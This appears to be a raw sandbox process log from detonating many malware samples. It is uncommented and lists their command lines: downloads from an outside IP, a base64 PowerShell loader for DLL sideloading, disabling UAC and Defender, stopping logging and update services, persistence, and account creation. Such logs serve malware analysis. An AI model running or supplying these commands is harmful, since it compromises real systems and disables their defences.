"C:\Users\Admin\Downloads\UrlHausFiles\rrq.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 10264 -ip 10264

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\system32\certutil.exe

certutil -urlcache -split -f http://206.217.142.166:1234/windows/dr/dr.bat e:\net\dr\dr.bat

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 11140 -s 1208

C:\Users\Admin\Downloads\UrlHausFiles\sunset1.exe

"C:\Users\Admin\Downloads\UrlHausFiles\sunset1.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10264 -s 896

C:\Users\Admin\Downloads\UrlHausFiles\test29.exe

"C:\Users\Admin\Downloads\UrlHausFiles\test29.exe"

C:\Windows\system32\msg.exe

msg * virus

C:\Users\Admin\Downloads\UrlHausFiles\app64.exe

"C:\Users\Admin\Downloads\UrlHausFiles\app64.exe"

C:\Users\Admin\Downloads\UrlHausFiles\kldrgawdtjawd.exe

"C:\Users\Admin\Downloads\UrlHausFiles\kldrgawdtjawd.exe"

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f5643cb8,0x7ff8f5643cc8,0x7ff8f5643cd8

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\UrlHausFiles\crss.exe'

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\explorer.exe

explorer.exe

C:\Windows\system32\attrib.exe

attrib +s +h d:\net

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System.exe'

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F

C:\Users\Admin\Downloads\UrlHausFiles\Office2024.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Office2024.exe"

C:\Users\Admin\AppData\Local\PhantomSoft\Support\winvnc.exe

C:\Users\Admin\AppData\Local\PhantomSoft\Support\winvnc.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c mkdir "\\?\C:\Windows \System32"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2020,9617657228872996946,14510716765459968439,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2032 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2020,9617657228872996946,14510716765459968439,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2012 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2020,9617657228872996946,14510716765459968439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2664 /prefetch:8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"

C:\Windows\system32\reg.exe

reg query HKEY_CLASSES_ROOT\http\shell\open\command

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,9617657228872996946,14510716765459968439,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3204 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,9617657228872996946,14510716765459968439,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,9617657228872996946,14510716765459968439,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2796 /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'crss.exe'

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Users\Admin\Downloads\UrlHausFiles\windowshost.exe

"C:\Users\Admin\Downloads\UrlHausFiles\windowshost.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c xcopy /y C:\Windows\System32\printui.exe "C:\Windows \System32"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\System32\cmd.exe

cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHBzOi8vZ2l0aHViLmNvbS91bnZkMDEvdW52bWFpbi9yYXcvbWFpbi91bjIvYm90cHJudC5kYXQiLCAkcHlsUGF0aCk7DQoJfQ0KCWVsc2V7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly91bnZkd2wuY29tL3VuMi9ib3Rwcm50LmRhdCIsICRweWxQYXRoKTsNCgl9DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICRweWxQYXRoKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOw0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyAyMDsJDQoJfQ0KCWlmICgkY291bnRlciAtZXEgMTApew0KCQlicmVhazsNCgl9DQoJJGNvdW50ZXIrKzsNCn0=')); Invoke-Expression $decoded;"

C:\Windows\system32\msg.exe

msg * virus

C:\Users\Admin\Downloads\UrlHausFiles\w.exe

"C:\Users\Admin\Downloads\UrlHausFiles\w.exe"

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\xcopy.exe

xcopy /y C:\Windows\System32\printui.exe "C:\Windows \System32"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Users\Admin\Downloads\UrlHausFiles\run.exe

"C:\Users\Admin\Downloads\UrlHausFiles\run.exe"

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D718.tmp\D719.tmp\D71A.bat C:\Users\Admin\Downloads\UrlHausFiles\run.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHBzOi8vZ2l0aHViLmNvbS91bnZkMDEvdW52bWFpbi9yYXcvbWFpbi91bjIvYm90cHJudC5kYXQiLCAkcHlsUGF0aCk7DQoJfQ0KCWVsc2V7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly91bnZkd2wuY29tL3VuMi9ib3Rwcm50LmRhdCIsICRweWxQYXRoKTsNCgl9DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICRweWxQYXRoKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOw0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyAyMDsJDQoJfQ0KCWlmICgkY291bnRlciAtZXEgMTApew0KCQlicmVhazsNCgl9DQoJJGNvdW50ZXIrKzsNCn0=')); Invoke-Expression $decoded;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c move /y C:\Users\Public\pyld.dll "C:\Windows \System32\printui.dll"

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\msg.exe

msg * virus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8f5643cb8,0x7ff8f5643cc8,0x7ff8f5643cd8

C:\Windows\system32\attrib.exe

attrib +s +h d:\net

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\GBClientApp\Wallpapers" /deny administrator:(OI)(CI)F /t /c

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\system32\conhost.exe

\\?\C:\Windows\system32\conhost.exe --headless --width 268 --height 44 --signal 0x570 --server 0x56c

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "

C:\Windows\system32\msg.exe

msg * virus

C:\Windows \System32\printui.exe

"C:\Windows \System32\printui.exe"

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"

C:\Program Files (x86)\Google\Update\Install\{2C57A37D-2ED2-4602-BF6E-99E06DF976FE}\131.0.6778.86_chrome_installer.exe

"C:\Program Files (x86)\Google\Update\Install\{2C57A37D-2ED2-4602-BF6E-99E06DF976FE}\131.0.6778.86_chrome_installer.exe" --verbose-logging --do-not-launch-chrome --channel=stable --system-level /installerdata="C:\Program Files (x86)\Google\Update\Install\{2C57A37D-2ED2-4602-BF6E-99E06DF976FE}\guiFEB6.tmp"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\GBClientApp\Wallpapers" /deny administrators:(OI)(CI)F /t /c

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,2178255728686242041,12539798572425724804,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2056 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2052,2178255728686242041,12539798572425724804,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2344 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2052,2178255728686242041,12539798572425724804,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2352 /prefetch:8

C:\ProgramData\Google\Chrome\updater.exe

C:\ProgramData\Google\Chrome\updater.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,2178255728686242041,12539798572425724804,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,2178255728686242041,12539798572425724804,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe

"C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,2178255728686242041,12539798572425724804,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3932 /prefetch:1

C:\Program Files (x86)\Google\Update\Install\{2C57A37D-2ED2-4602-BF6E-99E06DF976FE}\CR_85700.tmp\setup.exe

"C:\Program Files (x86)\Google\Update\Install\{2C57A37D-2ED2-4602-BF6E-99E06DF976FE}\CR_85700.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Google\Update\Install\{2C57A37D-2ED2-4602-BF6E-99E06DF976FE}\CR_85700.tmp\CHROME.PACKED.7Z" --verbose-logging --do-not-launch-chrome --channel=stable --system-level /installerdata="C:\Program Files (x86)\Google\Update\Install\{2C57A37D-2ED2-4602-BF6E-99E06DF976FE}\guiFEB6.tmp"

C:\Windows\system32\msg.exe

msg * virus

C:\Program Files (x86)\Google\Update\Install\{2C57A37D-2ED2-4602-BF6E-99E06DF976FE}\CR_85700.tmp\setup.exe

"C:\Program Files (x86)\Google\Update\Install\{2C57A37D-2ED2-4602-BF6E-99E06DF976FE}\CR_85700.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=131.0.6778.86 --initial-client-data=0x244,0x248,0x24c,0x220,0x250,0x7ff6e30a5d68,0x7ff6e30a5d74,0x7ff6e30a5d80

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Users\Admin\AppData\Local\Temp\comvalidate_ljv3.exe

C:\Users\Admin\AppData\Local\Temp\comvalidate_ljv3.exe

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 8908 -ip 8908

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 8908 -s 1776

C:\Windows\system32\attrib.exe

attrib -h "C:\Users\Administrator\Desktop\Google Chrome.exe"

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\system32\msg.exe

msg * virus

C:\Users\Admin\Downloads\UrlHausFiles\help.scr

"C:\Users\Admin\Downloads\UrlHausFiles\help.scr" /S

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Users\Admin\Downloads\UrlHausFiles\ardara.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ardara.exe"

C:\Windows\system32\msg.exe

msg * virus

C:\Users\Admin\Downloads\UrlHausFiles\ee.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ee.exe"

C:\Users\Admin\Downloads\UrlHausFiles\boooba.exe

"C:\Users\Admin\Downloads\UrlHausFiles\boooba.exe"

C:\Windows\system32\attrib.exe

attrib -h "C:\Users\Administrator\Desktop\Coc Coc.exe"

C:\Windows\system32\msg.exe

msg * virus

C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe

"C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe"

C:\Users\Admin\Downloads\UrlHausFiles\test25.exe

"C:\Users\Admin\Downloads\UrlHausFiles\test25.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Users\Admin\Downloads\UrlHausFiles\IMG001.exe

"C:\Users\Admin\Downloads\UrlHausFiles\IMG001.exe"

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\Downloads\UrlHausFiles\boooba.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\certutil.exe

certutil -urlcache * delete

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\UrlHausFiles\1.bat" "

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe

C:\Windows\system32\msg.exe

msg * virus

C:\Users\Admin\Downloads\UrlHausFiles\msf.exe

"C:\Users\Admin\Downloads\UrlHausFiles\msf.exe"

C:\Windows\system32\net.exe

net user Admin abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789RAND_INDEXabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789RAND_INDEXabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789RAND_INDEXabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789RAND_INDEXabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789RAND_INDEXabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789RAND_INDEXabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789RAND_INDEXabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789RAND_INDEXabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789RAND_INDEXabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789RAND_INDEXabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789RAND_INDEXabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789RAND_INDEX /add /passwordchg:no

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user Admin abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789RAND_INDEXabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789RAND_INDEXabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789RAND_INDEXabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789RAND_INDEXabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789RAND_INDEXabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789RAND_INDEXabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789RAND_INDEXabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789RAND_INDEXabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789RAND_INDEXabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789RAND_INDEXabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789RAND_INDEXabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789RAND_INDEX /add /passwordchg:no

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\Downloads\UrlHausFiles\test24.exe

"C:\Users\Admin\Downloads\UrlHausFiles\test24.exe"

C:\Windows\system32\msg.exe

msg * virus

C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe

C:\Windows\system32\schtasks.exe

SchTasks /Delete /TN "\Microsoft\Windows\Task Manager\Interactive" /F

C:\Users\Admin\Downloads\UrlHausFiles\st.exe

"C:\Users\Admin\Downloads\UrlHausFiles\st.exe"

C:\Windows\system32\schtasks.exe

SchTasks /Create /SC ONLOGON /TN "my dr" /TR "e:\net\dr\dr.bat" /f

C:\Users\Admin\Downloads\UrlHausFiles\WindowstDriverAutoUpdater_X64.exe

"C:\Users\Admin\Downloads\UrlHausFiles\WindowstDriverAutoUpdater_X64.exe"

C:\Windows\System32\Wbem\WMIC.exe

wmic UserAccount where Name='Admin' set PasswordExpires=False

C:\WINDOWS\SYSTEM32\cmd.exe

